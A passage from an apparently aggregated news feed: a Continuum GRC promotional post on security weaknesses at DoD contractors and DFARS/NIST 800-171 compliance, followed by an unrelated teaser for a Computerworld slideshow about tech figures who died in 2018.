  • Implementing intrusion detection capabilities on classified networks
  • Requiring written justification to obtain and elevate system access for users
  • Consistently implementing physical security controls to limit unauthorized access to facilities that manage BMDS technical information

Cyber security problems abound among DoD and other federal contractors

The OIG report comes on the heels of another the office issued earlier this year, citing security problems specifically at contractor-run military facilities. The WSJ report on Chinese hackers implied that inadequate security is the norm, not the exception, at federal contractors and subcontractors, citing an intelligence official who described military subcontractors as “lagging behind in cybersecurity and frequently [suffering] breaches” that impact not just the military branch they work for, but also other branches.

In theory, military contractors shouldn’t be having these problems. Most federal contractors must comply with the strict security controls outlined in NIST 800-171, and DoD contractors must comply with DFARS 800-171. DoD contractors were required to, at minimum, have a “system security plan” in place by December 31, 2017. However, many small and mid-sized organizations missed the December 31 deadline, often because they felt they did not have the resources to comply. However, continued non-compliance puts these vendors’ contracts at risk of cancellation, as well as national security at risk from Chinese hackers and other cyber criminals.

It’s not too late to begin compliance efforts. If your agency starts working towards compliance now, you can demonstrate that you have a plan to comply and are making progress with it to your prime contractor, subcontractor, or DoD contracting officer.

Affordable DFARS 800-171 compliance services are available for small and mid-sized federal contractors

Continuum GRC’s IT Audit Machine (ITAM) greatly simplifies the compliance process and significantly cuts the time and costs involved, putting NIST 800-171 and DFARS 800-171 compliance within reach of small and mid-sized organizations. Additionally, Continuum GRC has partnered with Gallagher Affinity to offer small and mid-sized federal contractors affordable packages that combine cyber and data breach insurance coverage with NIST 800-171 and DFARS 800-171 compliance services.

The cyber security experts at Continuum GRC have deep knowledge of the cyber security field, are continually monitoring the latest information security threats, and are committed to protecting your organization from security breaches. Continuum GRC offers full-service and in-house risk assessment and risk management subscriptions, and we help companies all around the world sustain proactive cyber security programs.

Continuum GRC is proactive cyber security®. Call 1-888-896-6207 to discuss your organization’s cyber security needs and find out how we can help your organization protect its systems and ensure compliance.

The post Chinese Hackers Pose a Serious Threat to Military Contractors appeared first on .

Tech luminaries we lost in 2018

Remembering our industry’s innovators
CW > In Memoriam 2018 > Tech luminaries we lost this year [slideshow cover]

Image by FreedomMaster / Getty Images

They were the founders of such household names as Atari and Microsoft. They built the hardware and software that powers the Internet. They used computers to give voice to the young and the disabled. And they rarely did so in the spotlight. Whether they ever achieved fame or fortune, these 13 women and men deserve a place in the history books for their lives, accomplishments, and contributions to science and information technology around the world.

To read this article in full, please click here